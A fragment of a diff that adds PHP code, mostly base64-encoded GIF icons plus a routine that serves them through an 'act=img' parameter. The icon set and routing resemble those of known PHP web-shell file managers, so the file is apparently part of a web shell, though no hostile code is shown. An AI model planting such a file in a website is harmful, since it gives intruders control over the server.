+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". 
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". 
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". 
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". 
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". 
+"yAsokBkQADs=", 
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". 
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", 
+"sort_asc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". 
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", 
+"sort_desc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". 
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", 
+"sql_button_drop"=> 
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". 
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". 
+"AQEAOw==", 
+"sql_button_empty"=> 
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". 
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", 
+"sql_button_insert"=> 
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". 
+"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", 
+"up"=> 
+"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". 
+"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". 
+"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", 
+"write"=> 
+"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". 
+"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". 
+"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", 
+"ext_asp"=> 
+"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". 
+"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". 
+"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", 
+"ext_mp3"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". 
+"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". 
+"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", 
+"ext_avi"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". 
+"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". 
+"PYXCyg+V2i44XeRmSfYqsGhAAgA7", 
+"ext_cgi"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". 
+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". 
+"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". 
+"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". 
+"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". 
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". 
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". 
+"RYtMAgEAOw==", 
+"ext_cmd"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". 
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". 
+"dmrYAMn1onq/YKpjvEgAADs=", 
+"ext_cpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". 
+"Eq7YrLDE7a4SADs=", 
+"ext_ini"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". 
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". 
+"SnEjgPVarHEHgrB43JvszsQEADs=", 
+"ext_diz"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". 
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". 
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". 
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". 
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". 
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". 
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". 
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". 
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". 
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". 
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". 
+"Ow==", 
+"ext_doc"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". 
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", 
+"ext_exe"=> 
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". 
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". 
+"xhIAOw==", 
+"ext_h"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". 
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". 
+"Wq/NknbbSgAAOw==", 
+"ext_hpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". 
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". 
+"UqUagnbLdZa+YFcCADs=", 
+"ext_htaccess"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". 
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". 
+"AAA7", 
+"ext_html"=> 
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". 
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". 
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". 
+"ADs=", 
+"ext_jpg"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". 
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". 
+"FxEAOw==", 
+"ext_js"=> 
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". 
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". 
+"a00AjYYBbc/o9HjNniUAADs=", 
+"ext_lnk"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". 
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". 
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". 
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". 
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". 
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". 
+"ADs=", 
+"ext_log"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". 
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", 
+"ext_php"=> 
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". 
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", 
+"ext_pl"=> 
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". 
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", 
+"ext_swf"=> 
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". 
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". 
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". 
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", 
+"ext_tar"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". 
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". 
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". 
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". 
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". 
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". 
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". 
+"u4tLAgEAOw==", 
+"ext_txt"=> 
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". 
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". 
+"UpPWG3Ig6Hq/XmRjuZwkAAA7", 
+"ext_wri"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". 
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", 
+"ext_xml"=> 
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". 
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". 
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". 
+"IQA7" 
+ ); 
+ //For simple size- and speed-optimization. 
+ $imgequals = array( 
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), 
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), 
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), 
+  "ext_html"=>array("ext_html","ext_htm"), 
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), 
+  "ext_lnk"=>array("ext_lnk","ext_url"), 
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"), 
+  "ext_doc"=>array("ext_doc","ext_dot"), 
+  "ext_js"=>array("ext_js","ext_vbs"), 
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), 
+  "ext_wri"=>array("ext_wri","ext_rtf"), 
+  "ext_swf"=>array("ext_swf","ext_fla"), 
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), 
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") 
+ ); 
+ if (!$getall) 
+ { 
+  header("Content-type: image/gif"); 
+  header("Cache-control: public"); 
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); 
+  header("Cache-control: max-age=".(60*60*24*7)); 
+  header("Last-Modified: ".date("r",filemtime(__FILE__))); 
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} 
+  if (empty($images[$img])) {$img = "small_unk";} 
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";} 
+  echo base64_decode($images[$img]); 
+ } 
+ else 
+ { 
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} 
+  natsort($images); 
+  $k = array_keys($images); 
+  echo  "<center>"; 
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} 
+  echo "</center>"; 
+ } 
+ exit; 
+} 
